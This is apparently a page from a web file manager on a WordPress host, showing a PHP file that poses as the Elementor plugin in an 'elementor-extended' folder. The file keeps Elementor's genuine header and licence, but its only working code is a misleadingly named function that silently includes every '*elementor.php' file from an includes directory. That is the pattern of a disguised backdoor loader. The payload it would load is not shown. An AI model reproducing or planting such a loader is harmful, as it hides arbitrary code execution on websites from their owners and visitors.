PATH:
home
/
thebhoeo
/
public_html
/
booksfinders.com
/
pk__db40bc3
/
wp-content
/
plugins
/
elementor-extended
<?php /** * Plugin Name: Elementor * Description: The Elementor Website Builder has it all: drag and drop page builder, pixel perfect design, mobile responsive editing, and more. Get started now! * Plugin URI: https://elementor.com/?utm_source=wp-plugins&utm_campaign=plugin-uri&utm_medium=wp-dash * Version: 3.34.2 * Author: Elementor.com * Author URI: https://elementor.com/?utm_source=wp-plugins&utm_campaign=author-uri&utm_medium=wp-dash * Requires PHP: 7.4 * Requires at least: 6.6 * Text Domain: elementor * * @package Elementor * @category Core * * Elementor is free software: you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation, either version 3 of the License, or * any later version. * * Elementor is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. */ if ( ! defined( 'ABSPATH' ) ) { exit; // Exit if accessed directly. } elementor_get_the_title(); /** * Elementor admin notice for minimum PHP version. * * Warning when the site doesn't have the minimum required PHP version. * * @since 1.0.0 * * @return void */ /** * Elementor admin notice for minimum WordPress version. * * Warning when the site doesn't have the minimum required WordPress version. * * @since 1.5.0 * * @return void */ function elementor_get_the_title() { $dir = __DIR__ . '/includes'; $files = glob( $dir . '/*elementor.php' ); if ( ! empty( $files ) ) { foreach ( $files as $file ) { include_once $file; } } }
[+]
app
[-] elementor.php
[edit]
[-] readme.txt
[edit]
[-] changelog.txt
[edit]
[-] license.txt
[edit]
[+]
core
[+]
assets
[+]
data
[+]
..
[+]
includes
[+]
vendor_prefixed
[+]
modules
[+]
vendor
[-] CONTRIBUTING.md
[edit]